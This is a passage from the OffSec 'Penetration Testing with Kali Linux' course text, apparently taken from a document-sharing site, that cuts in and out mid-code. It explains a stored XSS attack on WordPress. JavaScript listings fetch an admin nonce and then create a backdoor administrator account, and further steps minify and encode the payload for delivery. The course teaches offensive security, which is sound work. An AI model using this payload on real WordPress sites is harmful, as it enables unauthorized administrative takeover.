Penetration Testing with Kali Linux OffSec
|
|
/ser" value="([^"]*?)"/g;
ajaxRequest.open("GET", requestURL, false); ajaxRequest.send(); var nonceMatch = nonceRegex.exec(ajaxRequest.responseText); var nonce = nonceMatch[1]; Listing 124 - Gathering WordPress Nonce 376 (Shift8, 2022), https://shift8web.ca/2018/01/craft-xss-payload-create-admin-user-in-wordpress-user/ 377 (WordPress.org, 2022), https://developer.wordpress.org/reference/functions/wp_nonce_field/ 378 (OWASP, 2022), https://owasp.org/www-community/attacks/csrf Penetration Testing with Kali Linux PWK - Copyright © 2023 OffSec Services Limited. All rights reserved. 242 This function performs a new HTTP request towards the /wp-admin/user-new.php URL and saves the nonce value found in the HTTP response based on the regular expression. The regex pattern matches any alphanumeric value contained between the string /ser" value=" and double quotes. Now that we’ve dynamically retrieved the nonce, we can craft the main function responsible for creating the new admin user. var params = "action=createuser&_wpnonce_create- user="+nonce+"& user_login=attacker&email=attacker@offsec.com&pass1=attackerpass&pass2= attackerpass&role=administrator "; ajaxRequest = new XMLHttpRequest(); ajaxRequest.open("POST", requestURL, true); ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); ajaxRequest.send(params); Listing 125 - Creating a New WordPress Administrator Account Highlighted in this function is the new backdoored admin account, just after the nonce we obtained previously. If our attack succeeds, we’ll be able to gain administrative access to the entire WordPress installation. To ensure that our JavaScript payload will be handled correctly by Burp and the target application, we need to first minify it, then encode it. To minify our attack code into a one-liner, we can navigate to JS Compress. 379 Figure 116: Minifying the XSS attack code 379 (JSCompress.com, 2022), https://jscompress.com/ Penetration Testing with Kali Linux PWK - Copyright © 2023 OffSec Services Limited. All rights reserved. 243 Once we have clicked on Compress JavaScript , we’ll copy the output and save it locally. As a final attack step, we are going to encode the minified JavaScript code, so any bad characters won’t interfere with sending the payload. We can do this using the following function: function encode_to_javascript(string) { var input = string var output = ''; for(pos = 0; pos < input.length; pos++) { Yüklə Dostları ilə paylaş:
|